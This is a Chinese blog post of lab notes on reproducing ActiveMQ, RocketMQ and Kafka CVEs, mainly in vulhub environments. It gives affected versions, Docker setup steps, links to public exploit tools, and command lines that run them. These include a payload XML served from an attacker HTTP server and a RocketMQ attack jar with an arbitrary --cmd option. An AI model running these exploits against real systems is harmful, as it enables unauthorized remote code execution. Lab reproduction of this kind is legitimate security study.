当前位置: 首页 > news >正文

服务攻防-处理平台安全消息队列ActiveMQRocketMQKafkaSpring包CVE复现

知识点:
服务攻防-处理平台-消息队列&ActiveMQ&RocketMQ&Kafka


消息队列:(Message Queue
基于异步通信模式的中间件技术,核心功能是在不同的应用程序、服务或组件之间传递消息(数据),起到缓冲、解耦、削峰等作用。发送方(生产者)将消息放入队列后即可返回,无需等待接收方(消费者)立即处理;接收方则从队列中按需获取消息并处理,实现了发送方和接收方的异步解耦。

常见的消息队列产品包括:(广泛应用于分布式系统、微服务架构中)
Apache Kafka、RabbitMQ、ActiveMQ、RocketMQ

演示案例-服务攻防-处理平台-消息队列&ActiveMQ&RocketMQ&Kafka

一、ActiveMQ

端口 条件8161web 需配置访问61616tcp 远程访问 开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。

CVE-2022-41678

影响版本:5.16.5, 5.17.3版本及以前
参考文章:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2022-41678/README.zh-cn.md

python poc.py-uadmin-padmin http://101.32.220.14:8161/




CVE-2023-46604

影响版本:5.18.2版本及以前

参考文章:https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2023-46604/README.zh-cn.md

python3-mhttp.server8888python3 poc.py 目标IP 目标端口 http://IP:8888/poc.xml





二、RocketMQ

端口号 用途说明9876NameServer通信端口用于客户端路由请求和Broker注册发现10911Broker主监听端口处理消息发送/消费等核心服务 Apache RocketMQ是一个分布式消息平台

文章复现参考:
https://mp.weixin.qq.com/s/UsjzX-HSt7QE1QeVBdEXaw
https://mp.weixin.qq.com/s/ceZY_TJqsaWyyHubrlKqSw

环境搭建:dockerpull apache/rocketmq:4.9.1dockerpull apacherocketmq/rocketmq-console:2.0.0dockerrun-d-p9876:9876-v/data/namesrv/logs:/root/logs-v/data/namesrv/store:/root/store--namermqnamesrv-e"MAX_POSSIBLE_HEAP=100000000"apache/rocketmq:4.9.1shmqnamesrv#1.创建broker文件目录mkdir-p/NDTSec/rocketmq/conf/#2.创建broker.conf文件vim/NDTSec/rocketmq/conf/broker.conf#3.将下面内容复制粘贴到broker.conf配置文件中:brokerClusterName=DefaultCluster brokerName=broker-a brokerId=0deleteWhen=04 fileReservedTime=48brokerRole=ASYNC_MASTER flushDiskType=SYNC_FLUSH#4.启动brokerdockerrun-d-p10911:10911-p10909:10909-v/data/broker/logs:/root/logs-v/data/broker/store:/root/store-v/NDTSec/rocketmq/conf/broker.conf:/opt/rocketmq/conf/broker.conf--namermqbroker--linkrmqnamesrv:namesrv-e"NAMESRV_ADDR=namesrv:9876"-e"MAX_POSSIBLE_HEAP=200000000"apache/rocketmq:4.9.1shmqbroker-c/opt/rocketmq/conf/broker.conf5、启动consoledockerrun-d--namermqconsole-p8899:8080--linkrmqnamesrv:namesrv-e"JAVA_OPTS=-Drocketmq.namesrv.addr=192.168.88.104:9876 -Dcom.rocketmq.sendMessageWithVIPChannel=false"-tapacherocketmq/rocketmq-console:2.0.0


CVE-2023-33246

文章参考:https://github.com/vulhub/vulhub/blob/master/rocketmq/CVE-2023-33246/README.zh-cn.md

项目工具:https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT

d:\Python3.8\python.exe check.py--ipip--port9876


项目工具:https://github.com/vulhub/rocketmq-attack

java-jarrocketmq-attack-1.1-SNAPSHOT.jar AttackBroker--targetip:port--cmd"xxxx"



CVE-2023-37582

项目工具:https://github.com/Malayke/CVE-2023-37582_EXPLOIT

python.exe CVE-2023-37582.py-ipip-p9876

项目工具:https://github.com/vulhub/rocketmq-attack

java-jarrocketmq-attack-1.1-SNAPSHOT.jar AttackNamesrv--target127.0.0.1:9876--file/tmp/test.txt--data"Hello World"

三、Kafka

分布式流处理平台,用于高吞吐量实时数据传输存储和处理, 广泛应用于日志收集、消息队列、数据管道、实时分析等场景。 默认端口:9092

CVE-2023-25194

漏洞影响版本:2.3.0 <= Apache Kafka <= 3.3.2

复现地址:https://github.com/vulhub/vulhub/blob/master/kafka/CVE-2023-25194/README.zh-cn.md






http://www.jsqmd.com/news/808722/

相关文章:

  • 终极指南:在Windows上快速安装安卓应用的完整方案
  • MCQTSS_QQMusic:深入解析QQ音乐API接口与数据获取技术
  • 现代电力系统工程师:从传统强电到智能能源系统的跨界挑战
  • 3步快速指南:如何在Windows电脑上直接安装Android应用?
  • 从零玩转Vulhub:手把手教你用Docker-Compose复现CVE-2017-15715漏洞
  • 2026年SMT贴片加工公司最新推荐榜:0201贴片加工/0402贴片加工/SMT焊接加工/DIP加工/电路板焊接加工 - 海棠依旧大
  • 保姆级避坑指南:手把手教你将RetinaFace-PyTorch模型部署到瑞芯微RK3588开发板
  • 2026年山东酒店袋泡茶OEM代加工:源头厂家直供与高品质客房茶包完全指南 - 精选优质企业推荐官
  • Arduino Uno/Mega/Nano外部中断引脚到底怎么选?一张图帮你搞定attachInterrupt配置
  • 跨平台服务器管理利器:Ipmitool在Linux、Windows与VMware环境下的部署与实战
  • 2026年云南酒店袋泡茶OEM代加工与高品质客房茶包源头厂家直供完全指南 - 精选优质企业推荐官
  • 从S3迁移到EC2?保姆级教程:用Nginx+CloudFront搭建高性能静态站(含缓存优化与成本对比)
  • 2026年云南酒店袋泡茶OEM代加工与客房茶包供应链深度横评 - 精选优质企业推荐官
  • 从TI Z-Stack到你的项目:OSAL调度器移植与裁剪实战指南(附STM32工程)
  • 2026年甘肃酒店客房茶包OEM/ODM源头供应商深度选购指南 - 精选优质企业推荐官
  • 多模态融合入门:从TFN的维度灾难,到LMF如何用‘模态特定因子’巧妙化解
  • ARM MPAM技术解析:PARTID转换与带宽控制实现
  • 2026年贵州酒店袋泡茶OEM代加工:源头直供与品质升级完全指南 - 精选优质企业推荐官
  • 实地探店日照任家台宗合渔家:本土老牌 2026 年 5 月实拍确认正常营业 - GEO代运营aigeo678
  • Cadence Virtuoso工艺库实战:从CDB到OA的迁移、安装与典型故障排查
  • 逆向工程的艺术:Python解析QQ音乐资源的完整技术指南
  • 2026年深圳挖掘机出租及拆除工程服务商参考:深圳市格云工程有限公司,覆盖全深圳挖掘机租赁、各类拆除施工服务 - 海棠依旧大
  • 2026年4月实力水陆挖掘机租赁收费,水陆两用精准把控挖掘作业 - 品牌推荐师
  • 基于Hyperliquid的Python量化交易机器人:架构、策略与实战部署
  • 2026年厦门酒店袋泡茶OEM代加工深度选购指南:源头厂家直供与高品质定制方案 - 精选优质企业推荐官
  • 别再手动传数据了!基于Workbench平台整合EDEM与Fluent的CFD-DEM耦合自动化工作流搭建
  • 2026年山西酒店袋泡茶OEM代加工与客房茶包定制供应链深度横评指南 - 精选优质企业推荐官
  • 2026年SMT加工服务商参考:昆山捷飞达电子、贴片加工、SMT焊接加工、电子产品设计、以成熟工艺赋能电子制造 - 海棠依旧大
  • ScienceClaw:面向科研的智能信息聚合框架设计与实践
  • Ultracite:基于UnoCSS的设计系统生成器,解决原子化CSS规模化难题